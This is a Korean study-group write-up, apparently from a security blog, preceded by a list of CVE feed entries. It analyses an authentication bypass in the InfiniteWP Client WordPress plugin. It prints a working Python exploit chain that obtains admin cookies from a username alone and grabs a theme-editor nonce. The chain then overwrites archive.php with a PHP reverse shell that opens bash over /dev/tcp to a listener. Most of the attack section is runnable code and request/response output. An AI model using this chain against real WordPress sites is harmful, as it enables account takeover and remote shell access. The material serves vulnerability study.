반응형
datetime subject id link
2023-10-20 00:05:02.667120 (Path Traversal) CVE-2023-31046 https://cve.report/CVE-2023-31046
2023-10-20 01:05:02.869793 (Remote Code Execution) CVE-2023-35187 https://cve.report/CVE-2023-35187
2023-10-20 01:05:02.931910 (Remote Code Execution) CVE-2023-35186 https://cve.report/CVE-2023-35186
2023-10-20 01:05:02.949623 (Remote Code Execution) CVE-2023-35184 https://cve.report/CVE-2023-35184
2023-10-20 01:05:02.963963 (Remote Code Execution) CVE-2023-35182 https://cve.report/CVE-2023-35182
2023-10-20 01:05:03.028814 (Remote Code Execution) CVE-2023-35180 https://cve.report/CVE-2023-35180
2023-10-20 01:05:03.045259 (Remote Attack, PHP, Execute Arbitrary code) CVE-2023-46042 https://cve.report/CVE-2023-46042
2023-10-20 04:05:03.576221 (Execute Arbitrary code) CVE-2023-39431 https://cve.report/CVE-2023-39431
2023-10-20 04:05:03.638119 (Execute Arbitrary code) CVE-2023-35986 https://cve.report/CVE-2023-35986
2023-10-20 04:05:03.654979 (Execute Arbitrary code) CVE-2023-5059 https://cve.report/CVE-2023-5059
2023-10-20 05:05:02.671035 (Remote Attack) CVE-2023-45992 https://cve.report/CVE-2023-45992
2023-10-20 05:05:02.735578 (PHP, SQL injection) CVE-2023-45826 https://cve.report/CVE-2023-45826
2023-10-20 05:05:02.750891 (Django) CVE-2023-45809 https://cve.report/CVE-2023-45809
2023-10-20 05:05:02.764220 (SQL injection) CVE-2023-45381 https://cve.report/CVE-2023-45381
2023-10-20 05:05:02.823533 (SQL injection) CVE-2023-43986 https://cve.report/CVE-2023-43986
2023-10-20 05:05:02.838137 (XSS) CVE-2023-40153 https://cve.report/CVE-2023-40153
2023-10-20 06:05:02.182917 (Arbitrary Command) CVE-2023-40145 https://cve.report/CVE-2023-40145
2023-10-20 06:05:02.238077 (SQL injection) CVE-2023-45376 https://cve.report/CVE-2023-45376
2023-10-20 06:05:02.254398 (Remote Attack) CVE-2023-27791 https://cve.report/CVE-2023-27791
2023-10-20 07:05:02.735816 (Docker) CVE-2023-45821 https://cve.report/CVE-2023-45821
2023-10-20 07:05:02.750270 (Arbitrary Command) CVE-2023-30131 https://cve.report/CVE-2023-30131
2023-10-20 08:05:02.662403 (XSS) CVE-2023-45819 https://cve.report/CVE-2023-45819
2023-10-20 08:05:02.726749 (XSS) CVE-2023-45818 https://cve.report/CVE-2023-45818
2023-10-20 08:05:02.740970 (GitHub) CVE-2023-45815 https://cve.report/CVE-2023-45815
2023-10-20 08:05:02.754176 (XSS) CVE-2023-45280 https://cve.report/CVE-2023-45280
2023-10-20 08:05:02.767166 (XSS) CVE-2023-45279 https://cve.report/CVE-2023-45279
2023-10-20 08:05:02.833304 (XSS) CVE-2023-43875 https://cve.report/CVE-2023-43875
2023-10-20 08:05:02.846280 (Execute Arbitrary code) CVE-2023-43359 https://cve.report/CVE-2023-43359
2023-10-20 08:05:02.859244 (XSS, Execute Arbitrary code) CVE-2023-43344 https://cve.report/CVE-2023-43344
2023-10-20 08:05:02.872245 (XSS, Execute Arbitrary code) CVE-2023-43342 https://cve.report/CVE-2023-43342
2023-10-20 08:05:02.931282 (XSS, Execute Arbitrary code) CVE-2023-43341 https://cve.report/CVE-2023-43341
2023-10-20 09:05:02.833917 (Remote Code Execution, GitHub) CVE-2023-44385 https://cve.report/CVE-2023-44385
2023-10-20 09:05:02.856564 (XSS, Execute Arbitrary code) CVE-2023-43345 https://cve.report/CVE-2023-43345
2023-10-20 09:05:02.872597 (XSS, Execute Arbitrary code) CVE-2023-43340 https://cve.report/CVE-2023-43340
2023-10-20 09:05:02.927215 (GitHub) CVE-2023-41899 https://cve.report/CVE-2023-41899
2023-10-20 09:05:02.943113 (GitHub) CVE-2023-41898 https://cve.report/CVE-2023-41898
2023-10-20 09:05:02.959032 (Remote Code Execution) CVE-2023-41897 https://cve.report/CVE-2023-41897
2023-10-20 09:05:02.973540 (npm, XSS) CVE-2023-41896 https://cve.report/CVE-2023-41896
2023-10-20 09:05:03.032053 (XSS) CVE-2023-41895 https://cve.report/CVE-2023-41895
2023-10-20 11:05:02.634089 (WordPress, PHP, Critical) CVE-2023-5646 https://cve.report/CVE-2023-5646
2023-10-20 13:05:02.462592 (XSS) CVE-2023-45394 https://cve.report/CVE-2023-45394
2023-10-20 14:05:02.857978 (Remote Code Execution, Vmware) CVE-2023-34051 https://cve.report/CVE-2023-34051
2023-10-20 14:05:02.872184 (PHP, XSS) CVE-2023-46267 https://cve.report/CVE-2023-46267
2023-10-20 14:05:02.937557 (XSS) CVE-2023-45471 https://cve.report/CVE-2023-45471
2023-10-20 15:05:02.887174 (Vmware) CVE-2023-34052 https://cve.report/CVE-2023-34052
2023-10-20 17:05:03.054931 (WordPress) CVE-2023-4943 https://cve.report/CVE-2023-4943
2023-10-20 17:05:03.069229 (WordPress) CVE-2023-4942 https://cve.report/CVE-2023-4942
2023-10-20 17:05:03.158474 (WordPress) CVE-2023-4940 https://cve.report/CVE-2023-4940
2023-10-20 17:05:03.172109 (WordPress) CVE-2023-4937 https://cve.report/CVE-2023-4937
2023-10-20 17:05:03.185604 (WordPress) CVE-2023-4935 https://cve.report/CVE-2023-4935
2023-10-20 17:05:03.225282 (WordPress) CVE-2023-4920 https://cve.report/CVE-2023-4920
2023-10-20 17:05:03.238786 (XSS) CVE-2023-2325 https://cve.report/CVE-2023-2325
2023-10-20 17:05:03.252282 (WordPress, PHP) CVE-2023-4488 https://cve.report/CVE-2023-4488
2023-10-20 18:05:02.655484 (Execute Arbitrary code) CVE-2023-39680 https://cve.report/CVE-2023-39680
2023-10-20 18:05:02.672346 (Remote Code Execution) CVE-2023-5524 https://cve.report/CVE-2023-5524
2023-10-20 18:05:02.725599 (Remote Code Execution) CVE-2023-5523 https://cve.report/CVE-2023-5523
2023-10-20 19:05:03.075122 (Vmware) CVE-2023-34046 https://cve.report/CVE-2023-34046
2023-10-20 19:05:03.135136 (Vmware) CVE-2023-34044 https://cve.report/CVE-2023-34044
2023-10-20 20:05:02.364514 (Remote Attack) CVE-2023-44256 https://cve.report/CVE-2023-44256
2023-10-20 20:05:02.430100 (Vmware) CVE-2023-34045 https://cve.report/CVE-2023-34045
2023-10-20 21:05:02.567898 (WordPress) CVE-2023-4941 https://cve.report/CVE-2023-4941
2023-10-20 21:05:02.630786 (WordPress) CVE-2023-4926 https://cve.report/CVE-2023-4926
2023-10-20 21:05:02.645102 (WordPress) CVE-2023-4924 https://cve.report/CVE-2023-4924
2023-10-20 21:05:02.660718 (WordPress) CVE-2023-4923 https://cve.report/CVE-2023-4923
2023-10-20 21:05:02.723198 (WordPress) CVE-2023-4796 https://cve.report/CVE-2023-4796
2023-10-20 21:05:02.740956 (WordPress) CVE-2023-4668 https://cve.report/CVE-2023-4668
2023-10-20 23:05:02.843061 (PHP, XSS) CVE-2023-46287 https://cve.report/CVE-2023-46287
반응형
반응형

[목적]

- 해당 글은 연구하기 위한 목적으로 정리하였으며, 앞으로도 연구 목적으로 올라올 예정임.

- 실력을 향상하기 위하여 스터디 모임에서 정리한 내용을 일부 공개하고 있으면 향후에도 동일한 방식으로 진행될 예정

ref

https://blog.sunggwanchoi.com/kor-infinitewp-client-1-9-4-5-authentication-bypass/

상세 분석 결과

환경 구축

wordpres 구축

  • wordpress : 4.8.3
  • mysql: 5.7

docker-compose.yml

version: "3.3"
    
services:
  db:
    image: mysql:5.7
    volumes:
      - ./db_data:/var/lib/mysql
    restart: always
    environment:
      MYSQL_ROOT_PASSWORD: somewordpress
      MYSQL_DATABASE: wordpress
      MYSQL_USER: wordpress
      MYSQL_PASSWORD: wordpress
    
  wordpress:
    depends_on:
      - db
    image: wordpress:4.8.3
    volumes:
      - ./wordpress_data:/var/www/html
    ports:
      - "8000:80"
    restart: always
    environment:
      WORDPRESS_DB_HOST: db:3306
      WORDPRESS_DB_USER: wordpress
      WORDPRESS_DB_PASSWORD: wordpress
      WORDPRESS_DB_NAME: wordpress
docker-compose up -d

계정 생성

  • admin 유저로 계정 생성

취약한 플러그 설치

원하는 버전의 플러그인 다운로드 방법

<https://downloads.wordpress.org/plugin/><플러그인_이름>.<버전>.zip
<https://downloads.wordpress.org/plugin/iwp-client.1.9.4.4.zip>

파일 업로드 용량 늘리는 방법

  • Increase Maximum Upload File Size, WP 파일 관리자 플러그인 설치
  • .htaccess 에 아래 내용 추가
  • php_value upload_max_filesize 32M php_value post_max_size 64M php_value memory_limit 128M php_value max_execution_time 300 php_value max_input_time 300

iwp-client 플러그인 설치

타겟

  • 이름 : Infinite WP
  • 유형 : 워드프레스 플러그인
  • 버젼 : < 1.9.4.5
  • 기능 : 여러개의 워드프레스 사이트를 관리,모니터링 해주는 플러그인

취약점

설명

  • Authentication Bypass 취약점
  • 공격자가 워드프레스 유저의 이름을 알고 있으면 해당 유저의 사용자 인증 쿠키를 알아낼 수 있는 취약점

페이로드

{"iwp_action": "add_site", "params": {"username": "admin"}}

취약점 발생 지점

  • init.php 파일
  • iwp_mmb_set_request 함수

PoC 실행

PoC 코드

import requests
import pprint
import argparse

parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", required=True, help="URL of the target WordPress site.")
args = parser.parse_args()

url = args.url
data = '_IWP_JSON_PREFIX_eyJpd3BfYWN0aW9uIjoiYWRkX3NpdGUiLCJwYXJhbXMiOnsidXNlcm5hbWUiOiJhZG1pbiJ9fQ=='
headers = {'Content-Type': 'application/x-www-form-urlencoded'}

# 요청 객체 사전 준비
request = requests.Request('POST', url, data=data, headers=headers)
prepared_request = request.prepare()

# 패킷 출력 (Burp Suite 스타일)
print("=== Request ===")
print(f"{prepared_request.method} {prepared_request.path_url} HTTP/1.1")
for header, value in prepared_request.headers.items():
    print(f"{header}: {value}")
print()
print(prepared_request.body)
print()

# 요청 보내기
response = requests.Session().send(prepared_request)

# 응답 패킷 출력
print("\\n=== Response ===")
print(f"HTTP/{response.raw.version} {response.status_code} {response.reason}")
for header, value in response.headers.items():
    print(f"{header}: {value}")
print()
if response.content:
    print(response.content.decode())
print()

if 'IWPHEADER' in response.text:
    print('\\n[+] Vulnerable')
else:
    print('\\n[+] Not vulnerable')

실행 결과

 python .\\poc.py -u <http://localhost:8000>
=== Request ===
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 93

_IWP_JSON_PREFIX_eyJpd3BfYWN0aW9uIjoiYWRkX3NpdGUiLCJwYXJhbXMiOnsidXNlcm5hbWUiOiJhZG1pbiJ9fQ==

=== Response ===
HTTP/11 200 OK
Date: Sat, 09 Sep 2023 06:14:06 GMT
Server: Apache/2.4.56 (Debian)
X-Powered-By: PHP/8.0.30
Set-Cookie: wordpress_70490311fe7c84acda8886406a6d884b=admin%7C1694412847%7COlXiXvkdOcf3sSTTshqHwurg0D0tbGmJjipzmYLeanR%7C3efd8dc118e2254f28f58e01e08379acb3c549eacd0fe6ab0b4e4b37bd21f18b; path=/wp-content/plugins; HttpOnly, wordpress_70490311fe7c84acda8886406a6d884b=admin%7C1694412847%7COlXiXvkdOcf3sSTTshqHwurg0D0tbGmJjipzmYLeanR%7C3efd8dc118e2254f28f58e01e08379acb3c549eacd0fe6ab0b4e4b37bd21f18b; path=/wp-admin; HttpOnly, wordpress_logged_in_70490311fe7c84acda8886406a6d884b=admin%7C1694412847%7COlXiXvkdOcf3sSTTshqHwurg0D0tbGmJjipzmYLeanR%7Ca095bf77a2d4a9697d0b8859a16435bb44e0245bebbf1d70a8897b68b0b9920b; path=/; HttpOnly, wordpress_sec_70490311fe7c84acda8886406a6d884b=admin%7C1694412847%7Cfw63YzduxLX0ZqDJvDlPEvWJ4SD5PcBxZakNBRDqzm2%7Ce2952a11bf492fc0e27bdd7820f01c9d134ae58efc291909e5296beb2a0ac4b9; path=/wp-content/plugins; secure; HttpOnly, wordpress_sec_70490311fe7c84acda8886406a6d884b=admin%7C1694412847%7Cfw63YzduxLX0ZqDJvDlPEvWJ4SD5PcBxZakNBRDqzm2%7Ce2952a11bf492fc0e27bdd7820f01c9d134ae58efc291909e5296beb2a0ac4b9; path=/wp-admin; secure; HttpOnly, wordpress_logged_in_70490311fe7c84acda8886406a6d884b=admin%7C1694412847%7Cfw63YzduxLX0ZqDJvDlPEvWJ4SD5PcBxZakNBRDqzm2%7C399a76985c0c86303848f480390bad5a4166268ca4b7a62d2de1c42e83b44c47; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 162
Content-Type: text/plain;charset=UTF-8

<IWPHEADER>_IWP_JSON_PREFIX_eyJlcnJvciI6IkludmFsaWQgYWN0aXZhdGlvbiBrZXkiLCJlcnJvcl9jb2RlIjoiaXdwX21tYl9hZGRfc2l0ZV9pbnZhbGlkX2FjdGl2YXRpb25fa2V5In0=<ENDIWPHEADER>

[+] Vulnerable

Request

=== Request ===
POST /wp-admin/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 93

_IWP_JSON_PREFIX_eyJpd3BfYWN0aW9uIjoiYWRkX3NpdGUiLCJwYXJhbXMiOnsidXNlcm5hbWUiOiJhZG1pbiJ9fQ==
  • {"iwp_action":"add_site","params":{"username":"admin"}}

Response

=== Response ===
HTTP/11 200 OK
Date: Sat, 09 Sep 2023 06:14:06 GMT
Server: Apache/2.4.56 (Debian)
X-Powered-By: PHP/8.0.30
Set-Cookie: wordpress_70490311fe7c84acda8886406a6d884b=admin%7C1694412847%7COlXiXvkdOcf3sSTTshqHwurg0D0tbGmJjipzmYLeanR%7C3efd8dc118e2254f28f58e01e08379acb3c549eacd0fe6ab0b4e4b37bd21f18b; path=/wp-content/plugins; HttpOnly, wordpress_70490311fe7c84acda8886406a6d884b=admin%7C1694412847%7COlXiXvkdOcf3sSTTshqHwurg0D0tbGmJjipzmYLeanR%7C3efd8dc118e2254f28f58e01e08379acb3c549eacd0fe6ab0b4e4b37bd21f18b; path=/wp-admin; HttpOnly, wordpress_logged_in_70490311fe7c84acda8886406a6d884b=admin%7C1694412847%7COlXiXvkdOcf3sSTTshqHwurg0D0tbGmJjipzmYLeanR%7Ca095bf77a2d4a9697d0b8859a16435bb44e0245bebbf1d70a8897b68b0b9920b; path=/; HttpOnly, wordpress_sec_70490311fe7c84acda8886406a6d884b=admin%7C1694412847%7Cfw63YzduxLX0ZqDJvDlPEvWJ4SD5PcBxZakNBRDqzm2%7Ce2952a11bf492fc0e27bdd7820f01c9d134ae58efc291909e5296beb2a0ac4b9; path=/wp-content/plugins; secure; HttpOnly, wordpress_sec_70490311fe7c84acda8886406a6d884b=admin%7C1694412847%7Cfw63YzduxLX0ZqDJvDlPEvWJ4SD5PcBxZakNBRDqzm2%7Ce2952a11bf492fc0e27bdd7820f01c9d134ae58efc291909e5296beb2a0ac4b9; path=/wp-admin; secure; HttpOnly, wordpress_logged_in_70490311fe7c84acda8886406a6d884b=admin%7C1694412847%7Cfw63YzduxLX0ZqDJvDlPEvWJ4SD5PcBxZakNBRDqzm2%7C399a76985c0c86303848f480390bad5a4166268ca4b7a62d2de1c42e83b44c47; path=/; HttpOnly
Vary: Accept-Encoding
Content-Length: 162
Content-Type: text/plain;charset=UTF-8

<IWPHEADER>_IWP_JSON_PREFIX_eyJlcnJvciI6IkludmFsaWQgYWN0aXZhdGlvbiBrZXkiLCJlcnJvcl9jb2RlIjoiaXdwX21tYl9hZGRfc2l0ZV9pbnZhbGlkX2FjdGl2YXRpb25fa2V5In0=<ENDIWPHEADER>
  • admin 유저의 인증이 담긴 쿠키들을 Set-Cookie를 통해 반환해주고 있음
  • {"error":"Invalid activation key","error_code":"iwp_mmb_add_site_invalid_activation_key"} 라는 응답을 보냄

정리

{"iwp_action":"add_site","params":{"username":"admin"}} 요청을 보내면 워드프레스는 invalid_activation_key 라는 에러를 반환하지만, 에러와 함께 admin 유저의 인증 쿠키가 같이 반환됩니다.

취약점 소스 코드 분석

취약한 함수

  • iwp_mmb_set_request()
  • iwp_mmb_parse_request()

취약한 함수가 포함된 파일

❯ grep -ri "iwp_mmb_set_request" .
./init.php:if (!function_exists ('iwp_mmb_set_request')) {
./init.php:     function iwp_mmb_set_request(){
./core.class.php:               add_action('setup_theme', 'iwp_mmb_set_request');
  • init.php
    • iwp_mmb_set_request 함수가 정의된 파일은 init.php
  • core.class.php

iwp_mmb_set_request

function iwp_mmb_set_request(){
		global $current_user, $iwp_mmb_core, $new_actions, $wp_db_version, $wpmu_version, $_wp_using_ext_object_cache, $iwp_mmb_activities_log;
		if (is_user_logged_in()) {
			iwp_plugin_compatibility_fix();
		}
		if (empty($iwp_mmb_core->request_params)) {
			return false;
		}
		$params = $iwp_mmb_core->request_params;
		$action = $iwp_mmb_core->request_params['iwp_action'];
  • Request : {"iwp_action":"add_site","params":{"username":"admin"}}
    • **request_params : {"username":"admin"}**
    • **request_params['iwp_action'] : "add_site"**
if(isset($params['username']) && !is_user_logged_in()){
			$user = function_exists('get_user_by') ? get_user_by('login', $params['username']) : iwp_mmb_get_user_by( 'login', $params['username'] );
			if (isset($user) && isset($user->ID)) {
				wp_set_current_user($user->ID);
				// Compatibility with All In One Security
				update_user_meta($user->ID, 'last_login_time', current_time('mysql'));
			}
			$isHTTPS = (bool)is_ssl();
			if($isHTTPS){
				wp_set_auth_cookie($user->ID);
			}else{
				wp_set_auth_cookie($user->ID, false, false);
				wp_set_auth_cookie($user->ID, false, true);
			}
		}
  • username 파라미터에 값이 설정되어 있는지 확인하고 로그인되어 있는지 확인
    • username: admin , 로그인 되어 있음
  • get_user_by 함수가 존재하면 username 에 해당하는 유저의 정보를 가져옴
    • 존재하지 않으면 wp_set_current_user() 함수를 이용해서 유저의 정보를 가져옴
  • 사이트가 HTTPS 프로토콜을 사용하고 있으면 기본 옵션으로 인증 쿠키를 설정
  • 사이트가 HTTP 프로토콜을 사용하고 있으면 HTTPOnly와 Secure 플래그를 모두 비활성화 하고 다시 Secure 플래그만 활성화하여 쿠키를 설정

※ username 만 가지고 사용자 인증을 하고 있다.

 보안상 문제가 있음

iwp_mmb_parse_request

global $current_user, $iwp_mmb_core, $new_actions, $wp_db_version, $wpmu_version, $_wp_using_ext_object_cache;
		if (strrpos($HTTP_RAW_POST_DATA_LOCAL, '_IWP_JSON_PREFIX_') !== false) {
			$request_data_array = explode('_IWP_JSON_PREFIX_', $HTTP_RAW_POST_DATA_LOCAL);
			$request_raw_data = $request_data_array[1];
			$data = trim(base64_decode($request_raw_data));
			$GLOBALS['IWP_JSON_COMMUNICATION'] = 1;
		}else{
			$data = false;
			$request_raw_data = $HTTP_RAW_POST_DATA_LOCAL;
			$serialized_data = trim(base64_decode($request_raw_data));
			if (is_serialized($serialized_data)) {
					iwp_mmb_response(array('error' => 'Please update your IWP Admin Panel to latest version', 'error_code' => 'update_panel'), false, true);
			}
		}
  • 클라이언트가 보내온 요청을 파싱하는 함수
  • $HTTP_RAW_POST_DATA_LOCAL 변수에 '_IWP_JSON_PREFIX_ 문자열이 존재하는지 확인
    • 존재하면?
      • _IWP_JSON_PREFIX_ 를 기준으로 문자열을 나눔
      • 두번째 문자열을 가져와 Base64 디코딩 후 앞뒤 공백을 제거
      • 전역 변수 $GLOBALS['IWP_JSON_COMMUNICATION'] 에 1을 할당하여 JSON 통신임을 나타냄
    • 존재하지 않으면?
      • 오류 메시지를 반환

 PoC 코드를 짤 때 _IWP_JSON_PREFIX_<Base64> 형태로 짜야 IWP 플러그인이 처리를 할 수 있다.

if (!$iwp_mmb_core->check_if_user_exists($params['username']))
				iwp_mmb_response(array('error' => 'Username <b>' . $params['username'] . '</b> does not have administrative access. Enter the correct username in the site options.', 'error_code' => 'username_does_not_have_administrative_access'), false);
			
			if ($action == 'add_site') {
				$params['iwp_action'] = $action;
				$iwp_mmb_core->request_params = $params;
				return;
			}
  • parameter로 받은 username이 관리자인지 아닌지 확인하고 관리자이면?
    • $action 이 'add_site' 일때
    • $params['iwp_action'] 에 $action 대입
    • request_params 에 $params 대입

 username 만 가지고 사용자 인증을 하고 있다.

 보안상 문제가 있음

iwp_mmb_add_site

if( !function_exists ( 'iwp_mmb_add_site' )) {
	function iwp_mmb_add_site($params)
	{
		global $iwp_mmb_core, $iwp_mmb_activities_log;
		$num = extract($params);
		
		if ($num) {
			if (!$iwp_mmb_core->get_option('iwp_client_action_message_id') && !$iwp_mmb_core->get_option('iwp_client_public_key')) {
				$public_key = base64_decode($public_key);
				
				
				if(trim($activation_key) != get_option('iwp_client_activate_key')){ //iwp
					iwp_mmb_response(array('error' => 'Invalid activation key', 'error_code' => 'iwp_mmb_add_site_invalid_activation_key'), false);
					return;
				}
  • response에 있었던 'Invalid activation key' 에러 메시지가 있음

PoC 제작

  1. URL과 관리자 이름을 유저로부터 받는다.
  2. IWP 페이로드를 이용해 타겟 워드프레스로 부터 관리자 쿠키를 받아낸다.
  3. 관리자 쿠키를 이용해 리버스 쉘을 전송한다.
  4. Theme Editor를 이용해 archive.php 페이지를 리버스 쉘로 변환한다.
  5. 해당 페이지를 방문하면 리버스 쉘이 작동한다.

main

arg = parseArguments()
    baseUrl = arg.u
    username = arg.n 
    themeName = arg.t
  • python .\\cve-2020-8772.py -u <http://127.0.0.1:8000> -n admin -t twentyseventeen
    • baseUrl = http://127.0.0.1:8000
    • username = admin
    • themeName = twentyseventeen
######### CHANGE ME !!! ######### 
    payload = """<?php exec("/bin/bash -c 'bash -i > /dev/tcp/192.168.35.15/4444 0>&1'");"""
######### CHANGE ME !!! #########
무선 LAN 어댑터 Wi-Fi:

   연결별 DNS 접미사. . . . :
   링크-로컬 IPv6 주소 . . . . : fe80::cf75:83a3:efa1:feca%4
   IPv4 주소 . . . . . . . . . : 192.168.35.15
   서브넷 마스크 . . . . . . . : 255.255.255.0
   기본 게이트웨이 . . . . . . : 192.168.35.1
  • payload → 현재 PC로 리버스 쉘 요청을 보내는 페이로드
print("[DEBUG] baseUrl - ", baseUrl)
    print("[DEBUG] username - ", username)
    print("[DEBUG] themeName - ", themeName)
    print("[DEBUG] Payload - ", payload)
    print("[DEBUG] (Make sure to change the payload)")
    print()
[DEBUG] baseUrl -  <http://127.0.0.1:8000>
[DEBUG] username -  admin
[DEBUG] themeName -  twentyseventeen
[DEBUG] Payload -  <?php exec("/bin/bash -c 'bash -i > /dev/tcp/192.168.35.15/4444 0>&1'");
[DEBUG] (Make sure to change the payload)
  • 디버그 메시지 출력
# Setting up basic url, header, payload for the attack 
    if baseUrl[-1] == '/':
        baseUrl = baseUrl[:-1]

    header = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537"}
    iwpPayload = '{"iwp_action":"add_site","params":{"username":"' + username + '"}}'
    iwpPayload = "_IWP_JSON_PREFIX_" + base64.b64encode(iwpPayload.encode('ascii')).decode('utf-8')

		session = requests.session()
  • 사용자 인증이 취약한 addsite 함수를 admin 유저로 접속하도록 iwpPayload 설정
  • 페이로드가 정상적으로 파싱 되도록 _IWP_JSON_PREFIX_ + <encoded_payload> 형태로 iwpPayload 설정
  • requests 모듈을 이용해서 세션 생성
print("[+] Stage1: IWP Exploit & Sanity Check")
    result = iwpExploit(session, baseUrl, header, iwpPayload)
    print()

    print("[+] Stage2: Getting Nonce")
    nonce = getNonce(session, baseUrl, header, themeName)
    if (nonce == False):
        print("[-] Stage 2 failed. Exiting.")
        exit(1)
    print()

    print("[+] Stage3: Injecting Payload into archive.php")
    result = injectPayload(session, baseUrl, header, nonce, payload, themeName)
    if (result == False):
        print("[-] Stage 1 failed. Exiting.")
        exit(1)
    print()
  • [1] admin 유저로 /wp-admin 사이트 접속이 가능한지 확인
  • [2] nonce 값 탈취 진행
  • [3] archive.php 페이지를 페이로드로 덮어써서 reverse shell 띄움
finalUrl = baseUrl + "/wp-content/themes/" + themeName + "/archive.php"
print("[+] Exploitation Successful. Open up netcat listener & Visit the following URL\\n")
print("[+] Visit --> ", finalUrl, "\\n")
  • 공격 성공 이후 출력되는 URL을 누르면 reverse shell이 연결됨

iwpExploit

def iwpExploit(session, url, header, data):
    """ 
    Exploit IWP vulnerability. All auth_cookie is stored in "session"

    :return:bool:Return True/False based on visiting the endpoint 
    """
    url = url + "/wp-admin/"
    print("[+] Trying " + url + " with IWP payload : " + data)

    try:
        res = session.post(url, headers=header, data=data)
        if res.status_code != 200:
            print("[-] Failed to reach endpoint")
            print(res.status_code)
            exit(1)
    except Exception as e:
        print("[-] Error occurred: " + str(e))
        exit(1)
    
    return True
[+] Stage1: IWP Exploit & Sanity Check
[+] Trying <http://127.0.0.1:8000/wp-admin/> with IWP payload : _IWP_JSON_PREFIX_eyJpd3BfYWN0aW9uIjoiYWRkX3NpdGUiLCJwYXJhbXMiOnsidXNlcm5hbWUiOiJhZG1pbiJ9fQ==
  • admin 유저로 /wp-admin 주소에 접속이 되는지 확인
  • 상태 코드가 200번이 아니면?
    • 접속 가능하기 때문에, 취약한 상태

getNonce

def getNonce(session, url, header, themeName):
    """
    Get Nonce and return Nonce 

    :return:nonce:str:Nonce of the theme-editor.php?file=archive.php 
    """

    # First, see if we can visit the theme-editor.php endpoint 
    urlFirst = url + '/wp-admin/theme-editor.php'
    print("[+] Trying " + urlFirst)

    try:
        res = session.get(urlFirst, headers=header)
        if res.status_code != 200:
            print("[-] Failed to reach endpoint")
            print(res.status_code)
            exit(1)
    except Exception as e:
        print("[-] Error occurred: Potential theme name problem - " + str(e))
        exit(1)
    

    # Second, retrieve the nonce from the page and return the nonce 
    urlSecond = url + '/wp-admin/theme-editor.php?file=archive.php&theme=' + themeName
    print("[+] Trying " + urlSecond)

    try:
        res = session.get(urlSecond, headers=header)
        if res.status_code != 200:
            print("[-] Failed to reach endpoint")
            print(res.status_code)
            exit(1)
    except Exception as e:
        print("[-] Error occurred: Potential theme name problem - " + str(e))
        exit(1)
    
    try:
        soup = BeautifulSoup(res.text, features='lxml')
        nonce = soup.find_all(id='_wpnonce')[0].get('value')
        print("[DEBUG] Nonce = ", nonce)
    except Exception as e:
        print('[-] Error occurred: Potential username problem - ' + str(e))
        exit(1)

    return nonce
[+] Stage2: Getting Nonce
[+] Trying <http://127.0.0.1:8000/wp-admin/theme-editor.php>
[+] Trying <http://127.0.0.1:8000/wp-admin/theme-editor.php?file=archive.php&theme=twentyseventeen>
[DEBUG] Nonce =  f6da1de574
  • http://127.0.0.1:8000/wp-admin/theme-editor.php?file=archive.php&theme=twentyseventeen
    • 해당 사이트에 admin 유저의 쿠키를 이용해서 접속하는 과정을 burpsuite로 잡아보면?
      • replay attack 방지를 위해 nonce 값이 함께 전달되고 있음
    • 추후 공격을 위해 해당 nonce 값을 수집

injectPayload

def injectPayload(session, url, header, nonce, payload, themeName):
    """
    Inject the php payload into archive.php 

    :return:bool:True/False based on successfully injecting php payload 
    """
    url = url + "/wp-admin/theme-editor.php"
    payloadData = {"_wpnonce": nonce, "newcontent": payload, "action": "update", "file": "archive.php", "theme": themeName, "scrollto": "0", "docs-list": '', "submit": "Update File"}

    print("[+] Trying " + url)
    print("[+] Full Payload : ", payloadData)

    try:
        res = session.post(url, headers=header, data=payloadData)
        if res.status_code != 200:
            print("[-] Failed to reach endpoint")
            print(res.status_code)
            exit(1)
    except Exception as e:
        print("[-] Error occurred: " + str(e))
        exit(1)

    return True
  • theme-editor.php 를 이용해서 archive.php 를 페이로드로 덮어씀
POST /wp-admin/theme-editor.php HTTP/1.1
Host: localhost:8000
Content-Length: 125362
Cache-Control: max-age=0
sec-ch-ua: 
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: <http://localhost:8000>
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: <http://localhost:8000/wp-admin/theme-editor.php>
Accept-Encoding: gzip, deflate
Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: wordpress_70490311fe7c84acda8886406a6d884b=admin%7C1694539956%7CI4n7dZOgnfQ2y32hhLTnBMm37cwqfwCWUWKANbRRGKr%7Cf7af4fbb3032c9c291419a2c7aa6610038a1c920f83ec0c31aac92374ebdac0b; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_70490311fe7c84acda8886406a6d884b=admin%7C1694539956%7CI4n7dZOgnfQ2y32hhLTnBMm37cwqfwCWUWKANbRRGKr%7C317e7700cadefeb3c65235c55650ee0e358222791c6a70ceb2520a406b4b0a44; wp-settings-time-1=1694367175
Connection: close

_wpnonce=bdddcebdd9&_wp_http_referer=%2Fwp-admin%2Ftheme-editor.php&newcontent=%2F*%0D%0ATheme+Name%3A+Twenty+Seventeen%0D%0ATheme+URI%3A+https%3A%2F%2Fwordpress.org%2Fthemes%2Ftwentyseventeen%2F%0D%0AAuthor%3A+the+WordPress+team%0D%0AAuthor+URI%3A+https%3A%2F%2Fwordpress.org%2F%0D%0ADescription%3A+Twenty+Seventeen+brings+your+site+to+life+with+header+video+and+immersive+featured+images.+With+a+focus+on+business+sites%2C+it+features+multiple+sections+on+the+front+page+as+well+as+widgets%2C+navigation+and+social+menus%2C+a+logo%2C+and+more.+Personalize+its+asymmetrical+grid+with+a+custom+color+scheme+and+showcase+your+multimedia+content+with+post+formats.+Our+default+theme+for+2017+works+great+in+many+languages%2C+for+any+abilities%2C+and+on+any+device.%0D%0AVersion%3A+1.3%0D%0ALicense%3A+GNU+General+Public+License+v2